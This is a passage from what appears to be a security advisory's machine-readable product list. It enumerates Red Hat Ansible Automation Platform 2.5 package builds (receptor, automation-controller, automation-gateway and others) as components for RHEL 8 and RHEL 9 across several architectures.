"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64"
},
"product_reference": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le"
},
"product_reference": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x"
},
"product_reference": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64"
},
"product_reference": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pulpcore-0:3.49.66-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch"
},
"product_reference": "python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pulpcore-0:3.49.66-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src"
},
"product_reference": "python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pyasn1-0:0.6.4-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch"
},
"product_reference": "python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pyasn1-0:0.6.4-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src"
},
"product_reference": "python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64"
},
"product_reference": "receptor-0:1.6.7-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le"
},
"product_reference": "receptor-0:1.6.7-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x"
},
"product_reference": "receptor-0:1.6.7-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src"
},
"product_reference": "receptor-0:1.6.7-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64"
},
"product_reference": "receptor-0:1.6.7-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptorctl-0:1.6.7-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch"
},
"product_reference": "receptorctl-0:1.6.7-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.6.31-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src"
},
"product_reference": "automation-controller-0:4.6.31-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5-Developer-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.6.31-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5-Developer-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src"
},
"product_reference": "receptor-0:1.6.7-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5-Developer-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptorctl-0:1.6.7-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch"
},
"product_reference": "receptorctl-0:1.6.7-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5-Developer-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src"
},
"product_reference": "receptor-0:1.6.7-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5-Inside-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptorctl-0:1.6.7-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch"
},
"product_reference": "receptorctl-0:1.6.7-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5-Inside-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.6.31-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64"
},
"product_reference": "automation-controller-0:4.6.31-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.6.31-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-0:4.6.31-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.6.31-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x"
},
"product_reference": "automation-controller-0:4.6.31-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.6.31-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src"
},
"product_reference": "automation-controller-0:4.6.31-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.6.31-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64"
},
"product_reference": "automation-controller-0:4.6.31-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.6.31-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.6.31-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch"
},
"product_reference": "automation-controller-server-0:4.6.31-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.6.31-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-0:1.1.21-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch"
},
"product_reference": "automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-0:1.1.21-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src"
},
"product_reference": "automation-eda-controller-0:1.1.21-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-base-0:1.1.21-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch"
},
"product_reference": "automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch"
},
"product_reference": "automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch"
},
"product_reference": "automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch"
},
"product_reference": "automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-0:2.5.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch"
},
"product_reference": "automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-0:2.5.20260804-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src"
},
"product_reference": "automation-gateway-0:2.5.20260804-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-config-0:2.5.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch"
},
"product_reference": "automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64"
},
"product_reference": "automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le"
},
"product_reference": "automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x"
},
"product_reference": "automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src"
},
"product_reference": "automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64"
},
"product_reference": "automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64"
},
"product_reference": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le"
},
"product_reference": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x"
},
"product_reference": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64"
},
"product_reference": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64"
},
"product_reference": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le"
},
"product_reference": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x"
},
"product_reference": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64"
},
"product_reference": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-server-0:2.5.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
